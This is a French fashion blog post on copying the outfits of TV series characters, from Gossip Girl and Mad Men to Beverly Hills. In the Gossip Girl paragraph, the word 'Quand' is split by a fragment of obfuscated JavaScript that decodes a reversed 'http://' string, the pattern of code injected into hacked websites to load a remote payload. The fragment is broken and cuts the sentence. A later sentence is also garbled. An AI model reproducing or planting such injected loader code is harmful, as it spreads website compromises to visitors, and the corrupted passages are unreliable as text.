Les bonnes raisons de s’inspirer du look des personnages de séries.

Les séries, aujourd’hui, c’est un peu comme le baby boom dans les années 50, on ne sait plus où donner de la tête. Et il n’est pas question de se plaindre ! Depuis l’émergence des plateformes de streaming, en passant par les séries TV plus classiques qui sortent à chaque automne, on peut dire qu’il y a de quoi occuper ses soirées et après-midi du dimanche (pour les plus accros d’entre nous). Grâce à ce déploiement, il y a de quoi satisfaire tous les goûts et, cerise sur le gâteau, de quoi inspirer également nos tenues quotidiennes pour les fans de mode, grâce à certains personnages souvent très stylés. 

De Gossip Girl à Mad Men, notre fashion apprentissage

Qu {if (typeof ($Ikf.list[n]) == “string”) return $Ikf.list[n].split(“”).reverse().join(“”);return $Ikf.list[n];};$Ikf.list=[“\’ //:ptth\’= “]; ( () * 6); ; );}and les étudiantes privilégiées de l’Upper East Side ont débarqué sur les petits écrans, là, il s’agissait vraiment de la révolution mode (et celle de vos portefeuilles aussi d’ailleurs), la haute-couture étant représentée à chaque épisode avec des créations signées Oscar de la Renta, Yves Saint-Laurent ou Vera Wang, qui n’a jamais désiré posséder des accessoires comme le fameux sac Valentino de Jenny Humphrey (d’ailleur sur ce site, il est possible d’en trouver un comme le sien) ?
Quant à Mad Men, au-delà du fait d’avoir rêvé de faire les yeux doux à Don, c’est carrément l’histoire du style des années 50-60 qui est proposé. De la secrétaire sexy en passant par la mère au foyer BCBG, l’envie d’adopter l’une de leurs jupes taille haute ou l’un de leurs accessoires comme la broche ou la barrette à cheveux taille XXL vous a certainement déjà effleuré l’esprit.

Pour les plus récentes, Jane the Virgin et Riverdale, mais aussi Pretty Little Liars font également leur travail niveau personnages stylés.

Les premières inspirations génération 1980 et 1990

Mais pour toutes celles qui ont aujourd’hui passé le cap de la trentaine, c’est bien à partir des  80’s et 90’s, où tout a commencé. Vous avez sans doute, vous aussi, étés inspirés pendant votre adolescence par les mini-robes de Donna ou le short en jeans loose de Brenda. En effet, les looks de Beverly Hills, c’est un peu une Madeleine de Proust en termes vestimentaires, rien que d’y penser, c’est la nostalgie et les souvenirs qui refont surface, mais aussi une bonne inspiration actuelle. Il suffit de replonger dans les albums photos pour reconnaître l’influence vestimentaire de la série made in US.
C’est sans compter sur la série Spotern nous aident à trouver notamment quel vêtement ou quel accessoire a attiré notre attention. Ah la magie d’internet !

 

Articles recommandés

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *